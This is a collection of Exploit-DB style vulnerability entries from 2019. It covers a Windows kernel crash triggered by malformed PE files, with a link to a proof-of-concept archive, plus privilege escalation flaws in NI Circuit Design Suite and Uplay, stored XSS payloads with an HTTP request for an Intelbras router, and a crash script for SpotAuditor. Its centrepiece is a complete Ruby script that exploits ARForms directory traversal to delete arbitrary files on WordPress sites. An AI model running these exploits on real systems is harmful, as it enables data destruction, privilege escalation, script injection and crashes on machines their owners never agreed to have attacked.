We have encountered a Windows kernel crash in memcpy() called by nt!MiRelocateImage while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF8017519A200,0x0000000000000000,0xFFFFF801713CF660,0x0000000000000000) A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff8017519a200, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff801713cf660, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: ffffc50241846ba0 -- (.trap 0xffffc50241846ba0) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=ffffcf84d2228de0 rbx=0000000000000000 rcx=ffffcf84d2228fb8 rdx=0000287ca2f71248 rsi=0000000000000000 rdi=0000000000000000 rip=fffff801713cf660 rsp=ffffc50241846d38 rbp=ffffc50241846fb0 r8=000000000000000c r9=0000000000000001 r10=00000000ffffffff r11=ffffcf84d2228fb8 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na pe cy nt!memcpy+0x20: fffff801`713cf660 488b0411 mov rax,qword ptr [rcx+rdx] ds:fffff801`7519a200=???????????????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff801714a6642 to fffff801713c46a0 STACK_TEXT: ffffc502`41846158 fffff801`714a6642 : fffff801`7519a200 00000000`00000003 ffffc502`418462c0 fffff801`71322be0 : nt!DbgBreakPointWithStatus ffffc502`41846160 fffff801`714a5d32 : fffff801`00000003 ffffc502`418462c0 fffff801`713d0f60 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12 ffffc502`418461c0 fffff801`713bca07 : ffffce67`3399cf80 fffff801`714d0110 00000000`00000000 fffff801`71663900 : nt!KeBugCheck2+0x952 ffffc502`418468c0 fffff801`713e0161 : 00000000`00000050 fffff801`7519a200 00000000`00000000 ffffc502`41846ba0 : nt!KeBugCheckEx+0x107 ffffc502`41846900 fffff801`7127aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff801`7519a200 : nt!MiSystemFault+0x1d3171 ffffc502`41846a00 fffff801`713ca920 : ffffcf84`cb274000 fffff801`713c79e5 00000000`00000000 fffff801`751a0c00 : nt!MmAccessFault+0x34f ffffc502`41846ba0 fffff801`713cf660 : fffff801`7188246d 00000000`6cc30000 ffffc502`41846fb0 ffffcf84`d2228d70 : nt!KiPageFault+0x360 ffffc502`41846d38 fffff801`7188246d : 00000000`6cc30000 ffffc502`41846fb0 ffffcf84`d2228d70 00000000`00000000 : nt!memcpy+0x20 ffffc502`41846d40 fffff801`717fc8a3 : ffffc502`41847180 ffffc502`41847180 ffffc502`41846fb0 ffffc502`41847180 : nt!MiRelocateImage+0x3dd ffffc502`41846eb0 fffff801`717dca20 : ffff9d05`96f58160 ffffc502`41847180 ffffc502`41847180 ffff9d05`96f58130 : nt!MiCreateNewSection+0x5ef ffffc502`41847010 fffff801`717dcd24 : ffffc502`41847040 ffffcf84`d24b8b00 ffff9d05`96f58160 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 ffffc502`41847100 fffff801`717dc37f : 00000000`11000000 ffffc502`418474c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 ffffc502`41847280 fffff801`717dc110 : 00000000`0828cf48 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff ffffc502`41847360 fffff801`713ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 ffffc502`418473d0 00007ffb`a3edc9a4 : 00007ffb`a1c71ae7 00000000`00000000 00000000`00000001 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 00000000`0828ced8 00007ffb`a1c71ae7 : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00000000 : ntdll!NtCreateSection+0x14 00000000`0828cee0 00007ffb`a1c75640 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 00000000`0828d110 00007ffb`a1c5c41d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 00000000`0828d180 00007ffb`a22603d1 : 00000000`055c1640 00000000`00000000 00006d1c`2a8cc01b 00007ffb`a29c643e : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 00000000`0828d1e0 00007ffb`a226035c : 00000000`00002234 00007ffb`a29cdba3 00000000`00002234 00000000`00000000 : SHELL32!_LoadVersionInfo+0x39 00000000`0828d250 00007ffb`a155c1c1 : 00000000`00000000 00000000`00000000 00000000`00000020 00000000`40040000 : SHELL32!CVersionPropertyStore::Initialize+0x2c [...] --- cut --- The issue reproduces on Windows 8.1, Windows 10 and their corresponding Server editions (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as an information disclosure primitive. We haven't managed to significantly minimize the test cases, but we determined that the crash is related to the invalid value of the Base Relocation Table directory address in the PE headers. Attached is an archive with two proof-of-concept PE images and the corresponding original files used to generate them. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47489.zip

# Exploit Title: National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation # Discovery Date: 2019-10-10 # Exploit Author: Ivan Marmolejo # Vendor Homepage: http://www.ni.com/en-us.html # Software Link: https://www.ni.com/en-us/shop/select/circuit-design-suite # Version: 14.0 # Vulnerability Type: Local # Tested on: Windows 10 Pro x64 Esp # Version: 10.0.18362 # Exploit.txt ############################################################################################################################################## Summary: Circuit Design Suite combines Multisim and Ultiboard software to offer a complete set of tools for circuit design,simulation, validation and design. Circuit Design Suite helps you design circuits with intuitive and cost-effective tools. You can perform an interactive SPICE simulation and make a perfect transition to PCB design and routing software. Built for education, research and design, the suite offers advanced simulation capabilities to give you a clear view of how circuits perform in any situation. Description: The application suffers from an unquoted search path issue impacting the service 'NiSvcLoc'. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application. ############################################################################################################################################## Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ NI Service Locator NiSvcLoc C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s Auto ############################################################################################################################################## Service info: C:\Users\user>sc qc NiSvcLoc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: NiSvcLoc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : NI Service Locator DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem ##############################################################################################################################################

# Exploit Title: Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting # Date: 2019-10-03 # Exploit Author: Prof. Joas Antonio # Vendor Homepage: https://www.intelbras.com/pt-br/ # Software Link: http://en.intelbras.com.br/node/25896 # Version: 1.0.18 # Tested on: Windows # CVE : CVE-2019–17411 # PoC 1: 1) Login to your router 2) After signing in as WAN Settings 3) Select for PPPOE mode 4) In the Service Name and Server Name field, enter any of these payloads: <script> alert ("Hacked") </script> <script> alert (1) </script> # PoC burp.txt POST /goform/AdvSetWan HTTP/1.1 Host: TARGET Content-Length: 281 Cache-Control: max-age=0 Origin: http://TARGET Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://TARGET/wan_connected.asp Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: ecos_pw=bWFkYXJhMTIxMQ==2dw:language=pt Connection: close

# Exploit Title: WordPress Arforms 3.7.1 - Directory Traversal # Date: 2019-09-27 # Exploit Author: Ahmad Almorabea # Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt # Software Link: https://www.arformsplugin.com/documentation/changelog/ # Version: 3.7.1 # CVE ID: CVE-2019-16902 #**************Start Notes************** # You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders. # Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet. # Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143. # But maybe in other forms maybe it's different so you have to change it accordingly. # This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on # There is a request file with this Script make sure to put it in the same folder. #**************End Notes**************** #!/usr/bin/env ruby require "net/http" require 'colorize' $host = ARGV[0] || "" $session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad" def start_function () puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow name = STDIN.gets if $host == "" puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red exit end check_existence_arform_folder execute_deletion_attack puts "Done ... see ya " + name end def send_checks(files_names) j = 1 while j <= files_names.length-1 uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j]) http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS request = Net::HTTP::Get.new(uri.request_uri) request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0" request["Connection"] = "keep-alive" request["Accept-Language"] = "en-US,en;q=0.5" request["Accept-Encoding"] = "gzip, deflate" request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" begin response = http.request(request).code puts "The File " + files_names[j] + " has the response code of " + response rescue Exception => e puts "[!] Failed!" puts e end j = j+1 end end def check_existence_arform_folder () path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"] $i = 0 results = [] while $i <= path_array.length-1 uri = URI.parse("http://#{$host}/#{path_array[$i]}") #puts uri http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) results[$i] = response.code #puts"response code is : " + response.code $i +=1 end puts "****************************************************" if results[0] == "200" || results[0] =="301" puts "The Plugin is Available on the following path : ".green + $host + path_array[0] else puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red exit end if (results[1] == "200" || results[1] == "301") puts "The User Files folder is Available on the following path : ".green + $host + path_array[1] else puts "We couldn't find the User Files folder, on the following path ".red + $host + path_array[1] end puts "****************************************************" end def execute_deletion_attack () puts "How many file you want to delete my man" amount = STDIN.gets.chomp.to_i if(amount == 0) puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue exit end file_names = [] file_names[0] = "143_772_1569713145702_temp3.txt" j = 1 while j <= amount.to_i puts "Name of the file number " + j.to_s file_names[j] = STDIN.gets file_names[j].strip! j = j+1 end uri = URI.parse("http://#{$host}") #puts uri http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie $i = 0 while $i <= file_names.length-1 puts "Starting the Attack Journey .. ".green uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") headers = { 'Referer' => 'From The Sky', 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', 'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615', 'Accept-Encoding' => 'gzip, deflate', 'Cookie' => global_cookie, 'X_FILENAME' => file_names[$i], 'X-FILENAME' => file_names[$i], 'Connection' => 'close' } http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Post.new(uri.path, headers) request.body = File.read("post_file") response = http.request request $i = $i +1 end execute_delete_request file_names,global_cookie,amount.to_i puts "Finished.........." end def execute_delete_request (file_names,cookies,rounds ) $i = 0 while $i <= file_names.length-1 puts "Starting the Attack on file No #{$i.to_s} ".green uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php") headers = { 'Referer' => 'From The Sky', 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', 'Accept' => '*/*', 'Accept-Language' => 'en-US,en;q=0.5', 'X-Requested-With'=> 'XMLHttpRequest', 'Cookie' => cookies, 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'Accept-Encoding' => 'gzip, deflate', 'Connection' => 'close' } http = Net::HTTP.new(uri.host, uri.port) http.use_ssl = true if uri.scheme == 'https' request = Net::HTTP::Post.new(uri.path,headers) request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143" response = http.request(request) if $i != 0 puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code end $i = $i +1 end send_checks file_names end start_function()

# Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation # Date: 2019-08-07 # Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi # Vendor Homepage: https://uplay.ubisoft.com/ # Version: 92.0.0.6280 # Tested on: Windows 10 x64 # CVE : N/A # Vulnerability Description: "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" has in secure permission # that allows all BUILTIN-USER has full permission. An attacker replace the # vulnerability execute file with malicious file. /////////////////////// Proof of Concept /////////////////////// C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F) BUILTIN\Users:(OI)(CI)(IO)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) Vulnerability Disclosure Timeline: ================================== 07 Aug, 19 : Found Vulnerability 07 Aug, 19 : Vendor Notification 14 Aug, 19 : Vendor Response 18 Sep, 19 : Vendor Fixed 18 Sep, 19 : Vendor released new patched

# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service # Author: Sanjana Shetty # Date: 2019-10-13 # Version: SpotAuditor 5.3.1.0 # Vendor Homepage: http://www.nsauditor.com # Software link: http://spotauditor.nsauditor.com/ # <POC by Sanjana Shetty> # Steps [1] Install the SpotAuditor software [2] Access the register functionality [3] In the name field enter 5000 A's and press enter, this will crash the application. ==== use below script to create 5000 A's to a text file and copy it to the name field============ print ("# POC by sanjana shetty") try: f = open("file.txt","w") junk = "\x41" * 5000 f.write(junk) print ("done") except (Exception, e): print ("#error - ") + str(e)